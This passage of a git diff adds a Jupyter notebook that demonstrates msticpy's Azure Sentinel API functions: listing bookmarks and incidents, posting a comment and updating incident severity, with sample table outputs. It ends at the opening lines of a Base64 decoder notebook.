+       "      <td>518a3ca6-44f0-4ac7-8179-97d18e48d65c</td>\n",
+       "      <td>pascals@microsoft.com</td>\n",
+       "      <td>Pascal Sauliere</td>\n",
+       "      <td>518a3ca6-44f0-4ac7-8179-97d18e48d65c</td>\n",
+       "      <td>pascals@microsoft.com</td>\n",
+       "      <td>Pascal Sauliere</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>// Event: An account failed to log on\\nSecurit...</td>\n",
+       "      <td>{\"TenantId\":\"8ecf8077-cf51-4820-aadd-14040956f...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>Microsoft.SecurityInsights/Bookmarks</td>\n",
+       "      <td>Rare Audit activity initiated by App - cbade9...</td>\n",
+       "      <td>2020-11-11T18:39:16.6537628+00:00</td>\n",
+       "      <td>2020-11-11T18:39:16.6537628+00:00</td>\n",
+       "      <td>f6b78447-93dc-4041-a22a-6eb1c34265e2</td>\n",
+       "      <td>Umesh.Nagdev@microsoft.com</td>\n",
+       "      <td>Umesh Nagdev</td>\n",
+       "      <td>f6b78447-93dc-4041-a22a-6eb1c34265e2</td>\n",
+       "      <td>Umesh.Nagdev@microsoft.com</td>\n",
+       "      <td>Umesh Nagdev</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>let current = 1d;\\nlet auditLookback = 14d;\\nl...</td>\n",
+       "      <td>{\"InitiatedByApp\":\"Microsoft Azure AD Group-Ba...</td>\n",
+       "      <td>2020-11-10T18:39:01.061+00:00</td>\n",
+       "      <td>2020-11-11T18:39:01.061+00:00</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>Microsoft.SecurityInsights/Bookmarks</td>\n",
+       "      <td>ThreatIntelligenceIndicator - 4193cb45b90a (2)</td>\n",
+       "      <td>2020-11-11T16:08:45.6964987+00:00</td>\n",
+       "      <td>2020-11-11T16:08:45.6964987+00:00</td>\n",
+       "      <td>525c09b5-61ef-4e10-8150-b44c97ead3a1</td>\n",
+       "      <td>Andrew.Blumhardt@microsoft.com</td>\n",
+       "      <td>Andrew Blumhardt</td>\n",
+       "      <td>525c09b5-61ef-4e10-8150-b44c97ead3a1</td>\n",
+       "      <td>Andrew.Blumhardt@microsoft.com</td>\n",
+       "      <td>Andrew Blumhardt</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>ThreatIntelligenceIndicator</td>\n",
+       "      <td>{\"TenantId\":\"8ecf8077-cf51-4820-aadd-14040956f...</td>\n",
+       "      <td>2020-11-10T16:08:26.089+00:00</td>\n",
+       "      <td>2020-11-11T16:08:26.089+00:00</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>My Bookmark</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 21 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                   type  \\\n",
+       "0  Microsoft.SecurityInsights/Bookmarks   \n",
+       "1  Microsoft.SecurityInsights/Bookmarks   \n",
+       "2  Microsoft.SecurityInsights/Bookmarks   \n",
+       "3  Microsoft.SecurityInsights/Bookmarks   \n",
+       "4  Microsoft.SecurityInsights/Bookmarks   \n",
+       "\n",
+       "                              properties.displayName  \\\n",
+       "0                                         mercury IP   \n",
+       "1                                             test 1   \n",
+       "2                   failed logons - decb171c8160 (1)   \n",
+       "3   Rare Audit activity initiated by App - cbade9...   \n",
+       "4     ThreatIntelligenceIndicator - 4193cb45b90a (2)   \n",
+       "\n",
+       "                  properties.created                 properties.updated  \\\n",
+       "0  2020-11-18T09:26:54.1605891+00:00  2020-11-18T09:26:54.1605891+00:00   \n",
+       "1  2020-11-18T15:25:01.1843361+00:00  2020-11-18T15:25:01.1843361+00:00   \n",
+       "2  2020-11-19T11:26:31.3053573+00:00  2020-11-19T11:26:31.3053573+00:00   \n",
+       "3  2020-11-11T18:39:16.6537628+00:00  2020-11-11T18:39:16.6537628+00:00   \n",
+       "4  2020-11-11T16:08:45.6964987+00:00  2020-11-11T16:08:45.6964987+00:00   \n",
+       "\n",
+       "          properties.createdBy.objectId      properties.createdBy.email  \\\n",
+       "0  e0139aae-7811-40ca-abc6-3fcb79140a6b       Tim.Burrell@microsoft.com   \n",
+       "1  b3a76793-1a0d-4bfe-95f6-96919d4b9acf             bnick@microsoft.com   \n",
+       "2  518a3ca6-44f0-4ac7-8179-97d18e48d65c           pascals@microsoft.com   \n",
+       "3  f6b78447-93dc-4041-a22a-6eb1c34265e2      Umesh.Nagdev@microsoft.com   \n",
+       "4  525c09b5-61ef-4e10-8150-b44c97ead3a1  Andrew.Blumhardt@microsoft.com   \n",
+       "\n",
+       "  properties.createdBy.name         properties.updatedBy.objectId  \\\n",
+       "0       Tim Burrell (MSTIC)  e0139aae-7811-40ca-abc6-3fcb79140a6b   \n",
+       "1                  Ben Nick  b3a76793-1a0d-4bfe-95f6-96919d4b9acf   \n",
+       "2           Pascal Sauliere  518a3ca6-44f0-4ac7-8179-97d18e48d65c   \n",
+       "3              Umesh Nagdev  f6b78447-93dc-4041-a22a-6eb1c34265e2   \n",
+       "4          Andrew Blumhardt  525c09b5-61ef-4e10-8150-b44c97ead3a1   \n",
+       "\n",
+       "       properties.updatedBy.email properties.updatedBy.name  ...  \\\n",
+       "0       Tim.Burrell@microsoft.com       Tim Burrell (MSTIC)  ...   \n",
+       "1             bnick@microsoft.com                  Ben Nick  ...   \n",
+       "2           pascals@microsoft.com           Pascal Sauliere  ...   \n",
+       "3      Umesh.Nagdev@microsoft.com              Umesh Nagdev  ...   \n",
+       "4  Andrew.Blumhardt@microsoft.com          Andrew Blumhardt  ...   \n",
+       "\n",
+       "     properties.labels                                   properties.query  \\\n",
+       "0                   []                            print \"192.168.15.6\" \\n   \n",
+       "1  [fluffyDogCampaign]  let auditLookback = 14d;\\n// Setting threshold...   \n",
+       "2                   []  // Event: An account failed to log on\\nSecurit...   \n",
+       "3                   []  let current = 1d;\\nlet auditLookback = 14d;\\nl...   \n",
+       "4                   []                        ThreatIntelligenceIndicator   \n",
+       "\n",
+       "                              properties.queryResult  \\\n",
+       "0  {\"print_0\":\"192.168.15.6\",\"__entityMapping\":{\"...   \n",
+       "1  {\"InitiatedBy\":\"seb@seccxp.ninja\",\"IpAddress\":...   \n",
+       "2  {\"TenantId\":\"8ecf8077-cf51-4820-aadd-14040956f...   \n",
+       "3  {\"InitiatedByApp\":\"Microsoft Azure AD Group-Ba...   \n",
+       "4  {\"TenantId\":\"8ecf8077-cf51-4820-aadd-14040956f...   \n",
+       "\n",
+       "       properties.queryStartTime        properties.queryEndTime  \\\n",
+       "0  2020-11-17T09:26:33.557+00:00  2020-11-18T09:26:33.557+00:00   \n",
+       "1                            NaN                            NaN   \n",
+       "2                            NaN                            NaN   \n",
+       "3  2020-11-10T18:39:01.061+00:00  2020-11-11T18:39:01.061+00:00   \n",
+       "4  2020-11-10T16:08:26.089+00:00  2020-11-11T16:08:26.089+00:00   \n",
+       "\n",
+       "  properties.incidentInfo.incidentId properties.incidentInfo.title  \\\n",
+       "0                               None                          None   \n",
+       "1                               None                          None   \n",
+       "2                               None                          None   \n",
+       "3                               None                          None   \n",
+       "4                               None                          None   \n",
+       "\n",
+       "  properties.incidentInfo.relationName properties.incidentInfo.severity  \\\n",
+       "0                                 None                             None   \n",
+       "1                                 None                             None   \n",
+       "2                                 None                             None   \n",
+       "3                                 None                             None   \n",
+       "4                                 None                             None   \n",
+       "\n",
+       "        properties.notes  \n",
+       "0                    NaN  \n",
+       "1  this looks suspicious  \n",
+       "2                    NaN  \n",
+       "3                    NaN  \n",
+       "4            My Bookmark  \n",
+       "\n",
+       "[5 rows x 21 columns]"
+      ]
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "bkmarks = azs.get_bookmarks(ws.value)\n",
+    "bkmarks.head().drop(columns=[\"id\", \"etag\", \"name\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also interact with Incidents via the API to get a set of all incidents, or a single incident:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>id</th>\n",
+       "      <th>name</th>\n",
+       "      <th>etag</th>\n",
+       "      <th>type</th>\n",
+       "      <th>properties.title</th>\n",
+       "      <th>properties.severity</th>\n",
+       "      <th>properties.status</th>\n",
+       "      <th>properties.owner.objectId</th>\n",
+       "      <th>properties.owner.email</th>\n",
+       "      <th>properties.owner.assignedTo</th>\n",
+       "      <th>...</th>\n",
+       "      <th>properties.additionalData.commentsCount</th>\n",
+       "      <th>properties.additionalData.alertProductNames</th>\n",
+       "      <th>properties.additionalData.tactics</th>\n",
+       "      <th>properties.firstActivityTimeGenerated</th>\n",
+       "      <th>properties.lastActivityTimeGenerated</th>\n",
+       "      <th>properties.relatedAnalyticRuleIds</th>\n",
+       "      <th>properties.incidentUrl</th>\n",
+       "      <th>properties.description</th>\n",
+       "      <th>properties.firstActivityTimeUtc</th>\n",
+       "      <th>properties.lastActivityTimeUtc</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>aabf6bcd-4134-b07b-1152-040aa0cdf069</td>\n",
+       "      <td>\"0402f99f-0000-0100-0000-5fbd43d50000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>Time series anomaly detection for total volume...</td>\n",
+       "      <td>High</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[Exfiltration]</td>\n",
+       "      <td>2020-11-24T17:10:35.7652885Z</td>\n",
+       "      <td>2020-11-24T17:10:35.7652885Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>e917efd0-331d-48b7-81d7-6205cee787f5</td>\n",
+       "      <td>\"0302de84-0000-0100-0000-5fbd23f30000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>XASE SENSITIVITY TEST</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>0</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>2020-11-24T15:17:06.8646498Z</td>\n",
+       "      <td>2020-11-24T15:17:06.8646498Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "      <td>LOWER CASE</td>\n",
+       "      <td>2020-11-24T14:55:03.95Z</td>\n",
+       "      <td>2020-11-24T14:55:03.95Z</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>81d59f6e-988f-4758-a2d2-90886befccab</td>\n",
+       "      <td>\"03029c83-0000-0100-0000-5fbd23d10000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>Case Sensitivity test UPPER</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>0</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>2020-11-24T15:16:33.5131821Z</td>\n",
+       "      <td>2020-11-24T15:16:33.5131821Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "      <td>sdff</td>\n",
+       "      <td>2020-11-24T14:57:49.43Z</td>\n",
+       "      <td>2020-11-24T14:57:49.43Z</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>b68151e7-890f-48aa-befb-3de2bc987557</td>\n",
+       "      <td>\"03022274-0000-0100-0000-5fbd222f0000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>Potential Password Spray</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>0</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[Persistence]</td>\n",
+       "      <td>2020-11-24T15:09:35.0020779Z</td>\n",
+       "      <td>2020-11-24T15:09:35.0020779Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "      <td>Description with a link</td>\n",
+       "      <td>2020-11-24T10:04:32.5297051Z</td>\n",
+       "      <td>2020-11-24T15:04:32.5297051Z</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>49f91f51-30ce-4028-9117-96ca3debbe14</td>\n",
+       "      <td>\"0302f05f-0000-0100-0000-5fbd204e0000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>Case Sensitivity test UPPER</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>0</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>2020-11-24T15:01:33.9949456Z</td>\n",
+       "      <td>2020-11-24T15:01:33.9949456Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "      <td>sdff</td>\n",
+       "      <td>2020-11-24T14:41:32.13Z</td>\n",
+       "      <td>2020-11-24T14:41:32.13Z</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 27 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                  id  \\\n",
+       "0  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "1  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "2  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "3  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "4  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "\n",
+       "                                   name  \\\n",
+       "0  aabf6bcd-4134-b07b-1152-040aa0cdf069   \n",
+       "1  e917efd0-331d-48b7-81d7-6205cee787f5   \n",
+       "2  81d59f6e-988f-4758-a2d2-90886befccab   \n",
+       "3  b68151e7-890f-48aa-befb-3de2bc987557   \n",
+       "4  49f91f51-30ce-4028-9117-96ca3debbe14   \n",
+       "\n",
+       "                                     etag  \\\n",
+       "0  \"0402f99f-0000-0100-0000-5fbd43d50000\"   \n",
+       "1  \"0302de84-0000-0100-0000-5fbd23f30000\"   \n",
+       "2  \"03029c83-0000-0100-0000-5fbd23d10000\"   \n",
+       "3  \"03022274-0000-0100-0000-5fbd222f0000\"   \n",
+       "4  \"0302f05f-0000-0100-0000-5fbd204e0000\"   \n",
+       "\n",
+       "                                   type  \\\n",
+       "0  Microsoft.SecurityInsights/Incidents   \n",
+       "1  Microsoft.SecurityInsights/Incidents   \n",
+       "2  Microsoft.SecurityInsights/Incidents   \n",
+       "3  Microsoft.SecurityInsights/Incidents   \n",
+       "4  Microsoft.SecurityInsights/Incidents   \n",
+       "\n",
+       "                                    properties.title properties.severity  \\\n",
+       "0  Time series anomaly detection for total volume...                High   \n",
+       "1                              XASE SENSITIVITY TEST              Medium   \n",
+       "2                        Case Sensitivity test UPPER              Medium   \n",
+       "3                           Potential Password Spray              Medium   \n",
+       "4                        Case Sensitivity test UPPER              Medium   \n",
+       "\n",
+       "  properties.status properties.owner.objectId properties.owner.email  \\\n",
+       "0               New                      None                   None   \n",
+       "1               New                      None                   None   \n",
+       "2               New                      None                   None   \n",
+       "3               New                      None                   None   \n",
+       "4               New                      None                   None   \n",
+       "\n",
+       "  properties.owner.assignedTo  ... properties.additionalData.commentsCount  \\\n",
+       "0                        None  ...                                       2   \n",
+       "1                        None  ...                                       0   \n",
+       "2                        None  ...                                       0   \n",
+       "3                        None  ...                                       0   \n",
+       "4                        None  ...                                       0   \n",
+       "\n",
+       "  properties.additionalData.alertProductNames  \\\n",
+       "0                            [Azure Sentinel]   \n",
+       "1                            [Azure Sentinel]   \n",
+       "2                            [Azure Sentinel]   \n",
+       "3                            [Azure Sentinel]   \n",
+       "4                            [Azure Sentinel]   \n",
+       "\n",
+       "  properties.additionalData.tactics properties.firstActivityTimeGenerated  \\\n",
+       "0                    [Exfiltration]          2020-11-24T17:10:35.7652885Z   \n",
+       "1                                []          2020-11-24T15:17:06.8646498Z   \n",
+       "2                                []          2020-11-24T15:16:33.5131821Z   \n",
+       "3                     [Persistence]          2020-11-24T15:09:35.0020779Z   \n",
+       "4                                []          2020-11-24T15:01:33.9949456Z   \n",
+       "\n",
+       "   properties.lastActivityTimeGenerated  \\\n",
+       "0          2020-11-24T17:10:35.7652885Z   \n",
+       "1          2020-11-24T15:17:06.8646498Z   \n",
+       "2          2020-11-24T15:16:33.5131821Z   \n",
+       "3          2020-11-24T15:09:35.0020779Z   \n",
+       "4          2020-11-24T15:01:33.9949456Z   \n",
+       "\n",
+       "                   properties.relatedAnalyticRuleIds  \\\n",
+       "0  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "1  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "2  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "3  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "4  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "\n",
+       "                              properties.incidentUrl   properties.description  \\\n",
+       "0  https://portal.azure.com/#asset/Microsoft_Azur...                      NaN   \n",
+       "1  https://portal.azure.com/#asset/Microsoft_Azur...               LOWER CASE   \n",
+       "2  https://portal.azure.com/#asset/Microsoft_Azur...                     sdff   \n",
+       "3  https://portal.azure.com/#asset/Microsoft_Azur...  Description with a link   \n",
+       "4  https://portal.azure.com/#asset/Microsoft_Azur...                     sdff   \n",
+       "\n",
+       "  properties.firstActivityTimeUtc properties.lastActivityTimeUtc  \n",
+       "0                             NaN                            NaN  \n",
+       "1         2020-11-24T14:55:03.95Z        2020-11-24T14:55:03.95Z  \n",
+       "2         2020-11-24T14:57:49.43Z        2020-11-24T14:57:49.43Z  \n",
+       "3    2020-11-24T10:04:32.5297051Z   2020-11-24T15:04:32.5297051Z  \n",
+       "4         2020-11-24T14:41:32.13Z        2020-11-24T14:41:32.13Z  \n",
+       "\n",
+       "[5 rows x 27 columns]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "incidents = azs.get_incidents(res_id=ws.value)\n",
+    "display(incidents.head())"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>id</th>\n",
+       "      <th>name</th>\n",
+       "      <th>etag</th>\n",
+       "      <th>type</th>\n",
+       "      <th>properties.title</th>\n",
+       "      <th>properties.severity</th>\n",
+       "      <th>properties.status</th>\n",
+       "      <th>properties.owner.objectId</th>\n",
+       "      <th>properties.owner.email</th>\n",
+       "      <th>properties.owner.assignedTo</th>\n",
+       "      <th>...</th>\n",
+       "      <th>properties.incidentNumber</th>\n",
+       "      <th>properties.additionalData.alertsCount</th>\n",
+       "      <th>properties.additionalData.bookmarksCount</th>\n",
+       "      <th>properties.additionalData.commentsCount</th>\n",
+       "      <th>properties.additionalData.alertProductNames</th>\n",
+       "      <th>properties.additionalData.tactics</th>\n",
+       "      <th>properties.firstActivityTimeGenerated</th>\n",
+       "      <th>properties.lastActivityTimeGenerated</th>\n",
+       "      <th>properties.relatedAnalyticRuleIds</th>\n",
+       "      <th>properties.incidentUrl</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...</td>\n",
+       "      <td>aabf6bcd-4134-b07b-1152-040aa0cdf069</td>\n",
+       "      <td>\"0402f99f-0000-0100-0000-5fbd43d50000\"</td>\n",
+       "      <td>Microsoft.SecurityInsights/Incidents</td>\n",
+       "      <td>Time series anomaly detection for total volume...</td>\n",
+       "      <td>High</td>\n",
+       "      <td>New</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>4601</td>\n",
+       "      <td>1</td>\n",
+       "      <td>0</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[Azure Sentinel]</td>\n",
+       "      <td>[Exfiltration]</td>\n",
+       "      <td>2020-11-24T17:10:35.7652885Z</td>\n",
+       "      <td>2020-11-24T17:10:35.7652885Z</td>\n",
+       "      <td>[/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...</td>\n",
+       "      <td>https://portal.azure.com/#asset/Microsoft_Azur...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>1 rows × 24 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                  id  \\\n",
+       "0  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de...   \n",
+       "\n",
+       "                                   name  \\\n",
+       "0  aabf6bcd-4134-b07b-1152-040aa0cdf069   \n",
+       "\n",
+       "                                     etag  \\\n",
+       "0  \"0402f99f-0000-0100-0000-5fbd43d50000\"   \n",
+       "\n",
+       "                                   type  \\\n",
+       "0  Microsoft.SecurityInsights/Incidents   \n",
+       "\n",
+       "                                    properties.title properties.severity  \\\n",
+       "0  Time series anomaly detection for total volume...                High   \n",
+       "\n",
+       "  properties.status properties.owner.objectId properties.owner.email  \\\n",
+       "0               New                      None                   None   \n",
+       "\n",
+       "  properties.owner.assignedTo  ... properties.incidentNumber  \\\n",
+       "0                        None  ...                      4601   \n",
+       "\n",
+       "  properties.additionalData.alertsCount  \\\n",
+       "0                                     1   \n",
+       "\n",
+       "  properties.additionalData.bookmarksCount  \\\n",
+       "0                                        0   \n",
+       "\n",
+       "  properties.additionalData.commentsCount  \\\n",
+       "0                                       2   \n",
+       "\n",
+       "   properties.additionalData.alertProductNames  \\\n",
+       "0                             [Azure Sentinel]   \n",
+       "\n",
+       "   properties.additionalData.tactics  properties.firstActivityTimeGenerated  \\\n",
+       "0                     [Exfiltration]           2020-11-24T17:10:35.7652885Z   \n",
+       "\n",
+       "   properties.lastActivityTimeGenerated  \\\n",
+       "0          2020-11-24T17:10:35.7652885Z   \n",
+       "\n",
+       "                   properties.relatedAnalyticRuleIds  \\\n",
+       "0  [/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8d...   \n",
+       "\n",
+       "                              properties.incidentUrl  \n",
+       "0  https://portal.azure.com/#asset/Microsoft_Azur...  \n",
+       "\n",
+       "[1 rows x 24 columns]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "incident = azs.get_incident(incident_id = incidents.iloc[0]['name'] , res_id=ws.value)\n",
+    "display(incident)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can also interact with an incident - adding comments or changing properties such as severity or status:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Comment posted.\n"
+     ]
+    }
+   ],
+   "source": [
+    "azs.post_comment(incident_id = incident.iloc[0]['name'], comment=\"This is a test comment\", res_id=ws.value)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Incident updated.\n"
+     ]
+    }
+   ],
+   "source": [
+    "azs.update_incident(incident_id = incident.iloc[0]['name'], update_items={\"severity\":\"High\"}, res_id=ws.value)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": []
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": false
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/Base64Unpack.ipynb b/docs/notebooks/Base64Unpack.ipynb
new file mode 100644
index 000000000..c8c23a438
--- /dev/null
+++ b/docs/notebooks/Base64Unpack.ipynb
@@ -0,0 +1,1270 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - Base64 Decoder\n",
+    "## Description:\n",
